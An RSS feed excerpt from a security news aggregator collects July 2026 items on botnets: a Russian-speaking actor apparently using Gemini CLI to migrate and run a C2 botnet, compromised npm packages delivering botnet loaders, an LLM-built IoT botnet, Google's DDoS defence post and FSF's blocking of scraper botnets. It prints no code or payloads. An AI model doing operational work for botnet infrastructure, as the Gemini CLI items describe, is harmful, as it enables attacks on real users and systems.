<title><![CDATA[Russian-Speaking Hacker Uses Gemini CLI to Deploy C2 Botnet in Six Minutes]]></title>
<description><![CDATA[A Russian-speaking threat actor tracked as “bandcampro” used Google Gemini CLI as an end-to-end operational assistant to migrate a command-and-control server, deploy a replacement VPS, configure Cloudflare tunnels, and restore control of compromised endpoints within six minutes. The findings are…...]]></description>
<link>https://tsecurity.de/de/3671042/it-security-nachrichten/russian-speaking-hacker-uses-gemini-cli-to-deploy-c2-botnet-in-six-minutes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671042/it-security-nachrichten/russian-speaking-hacker-uses-gemini-cli-to-deploy-c2-botnet-in-six-minutes/</guid>
<pubDate>Wed, 15 Jul 2026 16:55:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A Russian-speaking threat actor tracked as “bandcampro” used Google Gemini CLI as an end-to-end operational assistant to migrate a command-and-control server, deploy a replacement VPS, configure Cloudflare tunnels, and restore control of compromised endpoints within six minutes. The findings are…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/russian-speaking-hacker-uses-gemini-cli-to-deploy-c2-botnet-in-six-minutes/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/russian-speaking-hacker-uses-gemini-cli-to-deploy-c2-botnet-in-six-minutes/">Russian-Speaking Hacker Uses Gemini CLI to Deploy C2 Botnet in Six Minutes</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacker Used Gemini CLI to Build a Live C&C Botnet in 6 Minutes]]></title>
<description><![CDATA[A Russian-speaking threat actor known as “bandcampro” has weaponized Google’s Gemini CLI AI agent to migrate, deploy, and operate a live command-and-control (C&C) botnet. Remarkably, the attacker completed the entire infrastructure migration in just six minutes, contributing only 11% of the total...]]></description>
<link>https://tsecurity.de/de/3670946/it-security-nachrichten/hacker-used-gemini-cli-to-build-a-live-cc-botnet-in-6-minutes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670946/it-security-nachrichten/hacker-used-gemini-cli-to-build-a-live-cc-botnet-in-6-minutes/</guid>
<pubDate>Wed, 15 Jul 2026 16:24:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A Russian-speaking threat actor known as “bandcampro” has weaponized Google’s Gemini CLI AI agent to migrate, deploy, and operate a live command-and-control (C&amp;C) botnet. Remarkably, the attacker completed the entire infrastructure migration in just six minutes, contributing only 11% of the total work himself while the AI performed the rest. TrendAI™ Research published these findings […]</p>
<p>The post <a href="https://cybersecuritynews.com/botnet-gemini-cli-in-six-miutes/">Hacker Used Gemini CLI to Build a Live C&amp;C Botnet in 6 Minutes</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian-Speaking Hacker Uses Gemini CLI to Deploy C2 Botnet in Six Minutes]]></title>
<description><![CDATA[A Russian-speaking threat actor tracked as “bandcampro” used Google Gemini CLI as an end-to-end operational assistant to migrate a command-and-control server, deploy a replacement VPS, configure Cloudflare tunnels, and restore control of compromised endpoints within six minutes. The findings are ...]]></description>
<link>https://tsecurity.de/de/3670804/it-security-nachrichten/russian-speaking-hacker-uses-gemini-cli-to-deploy-c2-botnet-in-six-minutes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670804/it-security-nachrichten/russian-speaking-hacker-uses-gemini-cli-to-deploy-c2-botnet-in-six-minutes/</guid>
<pubDate>Wed, 15 Jul 2026 15:23:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A Russian-speaking threat actor tracked as “bandcampro” used Google Gemini CLI as an end-to-end operational assistant to migrate a command-and-control server, deploy a replacement VPS, configure Cloudflare tunnels, and restore control of compromised endpoints within six minutes. The findings are based on an analysis of Gemini CLI session logs spanning March 19 through April 21, […]</p>
<p>The post <a href="https://gbhackers.com/gemini-cli-to-deploy-c2-botnet/">Russian-Speaking Hacker Uses Gemini CLI to Deploy C2 Botnet in Six Minutes</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kompromittierte AsyncAPI-npm-Packages verteilen Multi-Stage Botnet-Loader via IPFS]]></title>
<description><![CDATA[BERLIN / LONDON (IT BOLTWISE) – Vier kompromittierte npm-Pakete aus dem @asyncapi-Namespace verteilen einen mehrstufigen Botnet-Loader. Die Malware wird nicht über install-Skripte ausgelöst, sondern beim Laden der Bibliothek via require() in Node.js, lädt dann verschlüsselte Folgekomponenten per ...]]></description>
<link>https://tsecurity.de/de/3670380/it-security-nachrichten/kompromittierte-asyncapi-npm-packages-verteilen-multi-stage-botnet-loader-via-ipfs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670380/it-security-nachrichten/kompromittierte-asyncapi-npm-packages-verteilen-multi-stage-botnet-loader-via-ipfs/</guid>
<pubDate>Wed, 15 Jul 2026 12:53:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-asyncapi-npm-botnet-ipfs-loader.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-asyncapi-npm-botnet-ipfs-loader.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-asyncapi-npm-botnet-ipfs-loader-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-asyncapi-npm-botnet-ipfs-loader-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-asyncapi-npm-botnet-ipfs-loader-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-asyncapi-npm-botnet-ipfs-loader-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-asyncapi-npm-botnet-ipfs-loader-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BERLIN / LONDON (IT BOLTWISE) – Vier kompromittierte npm-Pakete aus dem @asyncapi-Namespace verteilen einen mehrstufigen Botnet-Loader. Die Malware wird nicht über install-Skripte ausgelöst, sondern beim Laden der Bibliothek via require() in Node.js, lädt dann verschlüsselte Folgekomponenten per IPFS nach. Als Kommunikations-Backbone dienen mehrere C2-Kanäle einschließlich HTTP, Nostr-Relays, BitTorrent DHT, libp2p und Ethereum-Smart-Contracts. Entscheidend: Die Veröffentlichung […]</p>
<div><a href="https://www.it-boltwise.de/kompromittierte-asyncapi-npm-packages-verteilen-multi-stage-botnet-loader-via-ipfs.html">... den vollständigen Artikel <strong>»Kompromittierte AsyncAPI-npm-Packages verteilen Multi-Stage Botnet-Loader via IPFS«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/kompromittierte-asyncapi-npm-packages-verteilen-multi-stage-botnet-loader-via-ipfs.html">Kompromittierte AsyncAPI-npm-Packages verteilen Multi-Stage Botnet-Loader via IPFS</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TuxBot v3: Inside an IoT Botnet Framework With LLM-Assisted Development]]></title>
<description><![CDATA[TuxBot v3 Evolution, an IoT botnet framework built with LLMs. Read our analysis of its cross-compiled binaries, C2 architecture and bugs.
The post TuxBot v3: Inside an IoT Botnet Framework With LLM-Assisted Development appeared first on Unit 42.]]></description>
<link>https://tsecurity.de/de/3670243/it-security-nachrichten/tuxbot-v3-inside-an-iot-botnet-framework-with-llm-assisted-development/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670243/it-security-nachrichten/tuxbot-v3-inside-an-iot-botnet-framework-with-llm-assisted-development/</guid>
<pubDate>Wed, 15 Jul 2026 12:08:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>TuxBot v3 Evolution, an IoT botnet framework built with LLMs. Read our analysis of its cross-compiled binaries, C2 architecture and bugs.</p>
<p>The post <a href="https://unit42.paloaltonetworks.com/tuxbot-v3-evolution-iot-botnet/">TuxBot v3: Inside an IoT Botnet Framework With LLM-Assisted Development</a> appeared first on <a href="https://unit42.paloaltonetworks.com/">Unit 42</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Compromised AsyncAPI npm Packages Deliver Multi-Stage Botnet Malware]]></title>
<description><![CDATA[Four compromised npm packages in the @asyncapi namespace have been observed distributing a multi-stage botnet loader, according to findings from OX Security, SafeDep, Socket, and StepSecurity.

The affected packages are listed below -


  @asyncapi/generator-helpers@1.1.1
  @asyncapi/generator-co...]]></description>
<link>https://tsecurity.de/de/3670215/it-security-nachrichten/compromised-asyncapi-npm-packages-deliver-multi-stage-botnet-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670215/it-security-nachrichten/compromised-asyncapi-npm-packages-deliver-multi-stage-botnet-malware/</guid>
<pubDate>Wed, 15 Jul 2026 11:54:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Four compromised npm packages in the @asyncapi namespace have been observed distributing a multi-stage botnet loader, according to findings from OX Security, SafeDep, Socket, and StepSecurity.

The affected packages are listed below -


  @asyncapi/generator-helpers@1.1.1
  @asyncapi/generator-components@0.7.1
  @asyncapi/generator@3.3.1
  @asyncapi/specs(v6.11.2, v6.11.2-alpha.1)

"The]]></content:encoded>
</item>
<item>
<title><![CDATA[Six Minutes to Compromise: How ‘Patriot Bait’ Actor Used AI to Build and Deploy a C&C Botnet]]></title>
<description><![CDATA[TrendAI™ Research analyzed over 200 Gemini CLI session logs showing how a Russian-speaking threat actor used AI to run a live botnet, finishing a full C&C migration in six minutes while doing just 11% of the work himself. This article…
Read more →
The post Six Minutes to Compromise: How ‘Patriot ...]]></description>
<link>https://tsecurity.de/de/3669426/it-security-nachrichten/six-minutes-to-compromise-how-patriot-bait-actor-used-ai-to-build-and-deploy-a-cc-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669426/it-security-nachrichten/six-minutes-to-compromise-how-patriot-bait-actor-used-ai-to-build-and-deploy-a-cc-botnet/</guid>
<pubDate>Wed, 15 Jul 2026 04:38:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>TrendAI™ Research analyzed over 200 Gemini CLI session logs showing how a Russian-speaking threat actor used AI to run a live botnet, finishing a full C&amp;C migration in six minutes while doing just 11% of the work himself. This article…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/six-minutes-to-compromise-how-patriot-bait-actor-used-ai-to-build-and-deploy-a-cc-botnet/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/six-minutes-to-compromise-how-patriot-bait-actor-used-ai-to-build-and-deploy-a-cc-botnet/">Six Minutes to Compromise: How ‘Patriot Bait’ Actor Used AI to Build and Deploy a C&amp;C Botnet</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Six Minutes to Compromise: How ‘Patriot Bait’ Actor Used AI to Build and Deploy a C&C Botnet]]></title>
<description><![CDATA[TrendAI™ Research analyzed over 200 Gemini CLI session logs showing how a Russian-speaking threat actor used AI to run a live botnet, finishing a full C&C migration in six minutes while doing just 11% of the work himself.]]></description>
<link>https://tsecurity.de/de/3668072/it-security-nachrichten/six-minutes-to-compromise-how-patriot-bait-actor-used-ai-to-build-and-deploy-a-cc-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668072/it-security-nachrichten/six-minutes-to-compromise-how-patriot-bait-actor-used-ai-to-build-and-deploy-a-cc-botnet/</guid>
<pubDate>Tue, 14 Jul 2026 15:24:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[TrendAI™ Research analyzed over 200 Gemini CLI session logs showing how a Russian-speaking threat actor used AI to run a live botnet, finishing a full C&amp;C migration in six minutes while doing just 11% of the work himself.]]></content:encoded>
</item>
<item>
<title><![CDATA[NPM: 148 „Student-Proxies“ wurden zu Browser-DDoS-Botnetzen]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Eine Angriffsserie mit 148 npm-Paketen tarnte sich als „Student-Proxy“ und verwandelte Browser in ein DDoS-Botnetz. Laut Analyse von JFrog lief die Kampagne Anfang Mai rund zwei Wochen und nutzte dabei einen Proxy-Client als Zustellmechanismus. Im Kern wird nicht beim npm-I...]]></description>
<link>https://tsecurity.de/de/3667908/it-security-nachrichten/npm-148-student-proxies-wurden-zu-browser-ddos-botnetzen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667908/it-security-nachrichten/npm-148-student-proxies-wurden-zu-browser-ddos-botnetzen/</guid>
<pubDate>Tue, 14 Jul 2026 14:25:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-student-proxy-ddos-browser-botnet.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-student-proxy-ddos-browser-botnet.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-student-proxy-ddos-browser-botnet-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-student-proxy-ddos-browser-botnet-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-student-proxy-ddos-browser-botnet-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-student-proxy-ddos-browser-botnet-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-student-proxy-ddos-browser-botnet-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Eine Angriffsserie mit 148 npm-Paketen tarnte sich als „Student-Proxy“ und verwandelte Browser in ein DDoS-Botnetz. Laut Analyse von JFrog lief die Kampagne Anfang Mai rund zwei Wochen und nutzte dabei einen Proxy-Client als Zustellmechanismus. Im Kern wird nicht beim npm-Installieren zugeschlagen, sondern erst im geöffneten Tab: Remote-Code wird nachgeladen und anschließend […]</p>
<div><a href="https://www.it-boltwise.de/npm-148-student-proxies-wurden-zu-browser-ddos-botnetzen.html">... den vollständigen Artikel <strong>»NPM: 148 „Student-Proxies“ wurden zu Browser-DDoS-Botnetzen«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/npm-148-student-proxies-wurden-zu-browser-ddos-botnetzen.html">NPM: 148 „Student-Proxies“ wurden zu Browser-DDoS-Botnetzen</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[148 getarnte npm-Pakete verwandeln Browser-Proxies in DDoS-Botnetze]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Eine neu analysierte npm-Kampagne nutzt 148 scheinbare Proxy-Tools als getarnte Botnet-Zellen: Jeder, der eine Proxy-Seite im Browser öffnet, gerät in den Datenstrom. Laut der Untersuchung bleibt die Schadlogik bewusst außerhalb des Install-Prozesses, um gängige Prüfmechani...]]></description>
<link>https://tsecurity.de/de/3667874/it-security-nachrichten/148-getarnte-npm-pakete-verwandeln-browser-proxies-in-ddos-botnetze/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667874/it-security-nachrichten/148-getarnte-npm-pakete-verwandeln-browser-proxies-in-ddos-botnetze/</guid>
<pubDate>Tue, 14 Jul 2026 14:08:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-browser-proxy-ddos-botnet.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-browser-proxy-ddos-botnet.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-browser-proxy-ddos-botnet-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-browser-proxy-ddos-botnet-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-browser-proxy-ddos-botnet-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-browser-proxy-ddos-botnet-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-browser-proxy-ddos-botnet-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Eine neu analysierte npm-Kampagne nutzt 148 scheinbare Proxy-Tools als getarnte Botnet-Zellen: Jeder, der eine Proxy-Seite im Browser öffnet, gerät in den Datenstrom. Laut der Untersuchung bleibt die Schadlogik bewusst außerhalb des Install-Prozesses, um gängige Prüfmechanismen zur Build-Zeit zu umgehen. Stattdessen laden die Pakete zur Laufzeit Remote-Code über einen mutable CDN-Zweig und […]</p>
<div><a href="https://www.it-boltwise.de/148-getarnte-npm-pakete-verwandeln-browser-proxies-in-ddos-botnetze.html">... den vollständigen Artikel <strong>»148 getarnte npm-Pakete verwandeln Browser-Proxies in DDoS-Botnetze«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/148-getarnte-npm-pakete-verwandeln-browser-proxies-in-ddos-botnetze.html">148 getarnte npm-Pakete verwandeln Browser-Proxies in DDoS-Botnetze</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[148 npm Packages Disguised as Student Proxies Turned Browsers Into a DDoS Botnet]]></title>
<description><![CDATA[A campaign of 148 npm packages disguised as student web proxies turned visitors’ browsers into a distributed denial-of-service botnet for roughly two weeks in May, according to new research from JFrog. The packages did not go after the developers who might…
Read more →
The post 148 npm Packages D...]]></description>
<link>https://tsecurity.de/de/3667320/it-security-nachrichten/148-npm-packages-disguised-as-student-proxies-turned-browsers-into-a-ddos-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667320/it-security-nachrichten/148-npm-packages-disguised-as-student-proxies-turned-browsers-into-a-ddos-botnet/</guid>
<pubDate>Tue, 14 Jul 2026 10:38:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A campaign of 148 npm packages disguised as student web proxies turned visitors’ browsers into a distributed denial-of-service botnet for roughly two weeks in May, according to new research from JFrog. The packages did not go after the developers who might…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/148-npm-packages-disguised-as-student-proxies-turned-browsers-into-a-ddos-botnet/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/148-npm-packages-disguised-as-student-proxies-turned-browsers-into-a-ddos-botnet/">148 npm Packages Disguised as Student Proxies Turned Browsers Into a DDoS Botnet</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[148 npm Packages Disguised as Student Proxies Turned Browsers Into a DDoS Botnet]]></title>
<description><![CDATA[A campaign of 148 npm packages disguised as student web proxies turned visitors' browsers into a distributed denial-of-service botnet for roughly two weeks in May, according to new research from JFrog.

The packages did not go after the developers who might install them. The operators used the re...]]></description>
<link>https://tsecurity.de/de/3667289/it-security-nachrichten/148-npm-packages-disguised-as-student-proxies-turned-browsers-into-a-ddos-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667289/it-security-nachrichten/148-npm-packages-disguised-as-student-proxies-turned-browsers-into-a-ddos-botnet/</guid>
<pubDate>Tue, 14 Jul 2026 10:24:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A campaign of 148 npm packages disguised as student web proxies turned visitors' browsers into a distributed denial-of-service botnet for roughly two weeks in May, according to new research from JFrog.

The packages did not go after the developers who might install them. The operators used the registry as free hosting for a booby-trapped proxy site and let the students who came to dodge]]></content:encoded>
</item>
<item>
<title><![CDATA[Exponential growth in DDoS attack volumes]]></title>
<description><![CDATA[Security threats such as distributed denial-of-service (DDoS) attacks disrupt businesses of all sizes, leading to outages, and worse, loss of user trust. These threats are a big reason why at Google we put a premium on service reliability that’s built on the foundation of a rugged network. To hel...]]></description>
<link>https://tsecurity.de/de/3662839/it-security-nachrichten/exponential-growth-in-ddos-attack-volumes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662839/it-security-nachrichten/exponential-growth-in-ddos-attack-volumes/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>Security threats such as distributed denial-of-service (DDoS) attacks disrupt businesses of all sizes, leading to outages, and worse, loss of user trust. These threats are a big reason why at Google we put a premium on service reliability that’s built on the foundation of a rugged network. </p><p>To help ensure reliability, we’ve devised some innovative ways to defend against advanced attacks. In this post, we’ll take a deep dive into DDoS threats, showing the trends we’re seeing and describing how we prepare for multi-terabit attacks, so your sites stay up and running.</p><h3>Taxonomy of attacker capabilities</h3><p>With a DDoS attack, an adversary hopes to disrupt their victim's service with a flood of useless traffic. While this attack doesn't expose user data and doesn't lead to a compromise, it can result in an outage and loss of user trust if not quickly mitigated.</p><p>Attackers are constantly developing new techniques to disrupt systems. They give their attacks fanciful names, like Smurf, Tsunami, XMAS tree, HULK, Slowloris, cache bust, TCP amplification, javascript injection, and a dozen variants of reflected attacks. Meanwhile, the defender must consider every possible target of a DDoS attack, from the network layer (routers/switches and link capacity) to the application layer (web, DNS, and mail servers). Some attacks may not even focus on a specific target, but instead attack every IP in a network. Multiplying the dozens of attack types by the diversity of infrastructure that must be defended leads to endless possibilities.</p><p>So, how can we simplify the problem to make it manageable? Rather than focus on attack methods, Google groups volumetric attacks into a handful of key metrics:</p><p></p><ul><li><b>bps</b>	network bits per second → attacks targeting network links</li><li><b>pps</b>	network packets per second → attacks targeting network equipment or DNS servers</li><li><b>rps</b>	HTTP(S) requests per second → attacks targeting application servers</li></ul><p></p><p>This way, we can focus our efforts on ensuring each system has sufficient capacity to withstand attacks, as measured by the relevant metrics.</p><h3>Trends in DDoS attack volumes</h3><p>Our next task is to determine the capacity needed to withstand the largest DDoS attacks for each key metric. Getting this right is a necessary step for efficiently operating a reliable network—overprovisioning wastes costly resources, while underprovisioning can result in an outage.</p><p>To do this, we analyzed hundreds of significant attacks we received across the listed metrics, and included credible reports shared by others. We then plot the largest attacks seen over the past decade to identify trends. (Several years of data prior to this period informed our decision of what to use for the first data point of each metric.)</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/DDoS_attacks.max-1000x1000.jpg" alt="DDoS attacks.jpg">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>The exponential growth across all metrics is apparent, often generating alarmist headlines as attack volumes grow. But we need to factor in the exponential growth of the internet itself, which provides bandwidth and compute to defenders as well. After accounting for the expected growth, the results are less concerning, though still problematic.</p><h3>Architecting defendable infrastructure</h3><p>Given the data and observed trends, we can now extrapolate to determine the spare capacity needed to absorb the largest attacks likely to occur.</p><p><b>bps</b> (network bits per second)<br>Our infrastructure absorbed a 2.5 Tbps DDoS in September 2017, the culmination of a six-month campaign that utilized multiple methods of attack. Despite simultaneously targeting thousands of our IPs, presumably in hopes of slipping past automated defenses, the attack had no impact. The attacker used <a href="https://blog.google/threat-analysis-group/how-were-tackling-evolving-online-threats" target="_blank">several networks</a> to spoof 167 Mpps (millions of packets per second) to 180,000 exposed CLDAP, DNS, and SNMP servers, which would then send large responses to us. This demonstrates the volumes a well-resourced attacker can achieve: This was four times larger than the record-breaking 623 Gbps attack from the Mirai botnet a year earlier. It remains the highest-bandwidth attack reported to date, leading to reduced confidence in the extrapolation.<br></p><p><b>pps</b> (network packets per second) <br>We’ve observed a consistent growth trend, with a 690 Mpps attack generated by an IoT botnet this year. A notable outlier was a 2015 attack on a customer VM, in which an IoT botnet ramped up to 445 Mpps in 40 seconds—a volume so large we initially thought it was a monitoring glitch!</p><p><b>rps</b> (HTTP(S) requests per second)<br>In March 2014, malicious javascript injected into thousands of websites via a network man-in-the-middle attack caused hundreds of thousands of browsers to flood YouTube with requests, peaking at 2.7 Mrps (millions of requests per second). That was the largest attack known to us until recently, when a Google Cloud customer was attacked with 6 Mrps. The slow growth is unlike the other metrics, suggesting we may be under-estimating the volume of future attacks.</p><p>While we can estimate the expected size of future attacks, we need to be prepared for the <i>unexpected</i>, and thus we over-provision our defenses accordingly. Additionally, we design our systems to degrade gracefully in the event of overload, and write playbooks to guide a manual response if needed. For example, our layered defense strategy allows us to block high-rps and high-pps attacks in the network layer before they reach the application servers. Graceful degradation applies at the network layer, too: Extensive peering and network ACLs designed to throttle attack traffic will mitigate potential collateral damage in the unlikely event links become saturated.</p><p>For more detail on the layered approach we use to mitigate record-breaking DDoS attacks targeting our services, infrastructure, or customers, see Chapter 10 of our book, <a href="https://landing.google.com/sre/resources/foundationsandprinciples/srs-book/" target="_blank">Building Secure and Reliable Systems</a>.</p><h3>Cloud-based defenses</h3><p>We recognize the scale of potential DDoS attacks can be daunting. Fortunately, by deploying <a href="https://cloud.google.com/armor">Google Cloud Armor</a> integrated into our <a href="https://cloud.google.com/load-balancing">Cloud Load Balancing </a>service—which can scale to absorb massive DDoS attacks—you can protect services deployed in Google Cloud, other clouds, or on-premise from attacks. We recently announced <a href="https://cloud.google.com/blog/products/identity-security/google-cloud-armor-features-to-protect-your-websites-and-applications">Cloud Armor Managed Protection</a>, which enables users to further simplify their deployments, manage costs, and reduce overall DDoS and application security risk.</p><p>Having sufficient capacity to absorb the largest attacks is just one part of a comprehensive DDoS mitigation strategy. In addition to providing scalability, our load balancer terminates network connections on our global edge, only sending well-formed requests on to backend infrastructure. As a result it can automatically filter many types of volumetric attacks. For example, UDP amplification attacks, synfloods, and some application-layer attacks will be silently dropped. The next line of defense is the Cloud Armor WAF, which provides built-in rules for common attacks, plus the ability to deploy custom rules to drop abusive application layer requests using a broad set of HTTP semantics.</p><h3>Working together for collective security</h3><p>Google works with others in the internet community to identify and dismantle infrastructure used to conduct attacks. As a specific example, even though the 2.5 Tbps attack in 2017 didn't cause any impact, we reported thousands of vulnerable servers to their network providers, and also worked with network providers to trace the source of the spoofed packets so they could be filtered.</p><p>We encourage everyone to join us in this effort. Individual users should ensure their computers and IoT devices are patched and secured. Businesses should report criminal activity, ask their network providers to trace the sources of spoofed attack traffic, and share information on attacks with the internet community in a way that doesn't provide timely feedback to the adversary. By working together, we can reduce the impact of DDoS attacks.</p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How the FSF Sysadmins are Blocking Botnets with reaction]]></title>
<description><![CDATA[For nearly two years the Free Software Foundation has been fighting web crawlers (including many aggressively scraping training data for AI models). A botnet controlling about five million IPs hit one system for six months in 2025. Their systems administrator wrote this week that they view these ...]]></description>
<link>https://tsecurity.de/de/3662458/it-security-nachrichten/how-the-fsf-sysadmins-are-blocking-botnets-with-reaction/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662458/it-security-nachrichten/how-the-fsf-sysadmins-are-blocking-botnets-with-reaction/</guid>
<pubDate>Sat, 11 Jul 2026 23:52:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[For nearly two years the Free Software Foundation has been fighting web crawlers (including many aggressively scraping training data for AI models). A botnet controlling about five million IPs hit one system for six months in 2025. Their systems administrator wrote this week that they view these as distributed denial-of-service attacks. 

How are they fighting back?


We noticed patterns in the scrapers that were abnormal, which gave us material for writing regular expressions. Searching for the regular expression then gave us a large lists of IP addresses. Looking up the origin of those IP addresses revealed that some of the crawlers were using botnets of residential IP addresses to scrape faster and avoid detection. We looked for what kinds of botnets might be generating the kind of traffic that we were seeing, and one that we suspected was called the "Vo1d" botnet, comprised of smart TVs running some sort of compromised app... We got confirmation that at least some of the botnet traffic hitting GNU Savannah was originating through the Vo1d/Popa botnet. 



We placed our regular expressions in fail2ban, and found that we were hitting the maximum rules that could be added to UFW firewall rules on our systems which showed degradation around 65,000 rules... We learned about ipset and configured fail2ban to add IP addresses that it found to IP sets. Using ipset, we kept building larger IP sets and did not find instability with as large as five million rules... 


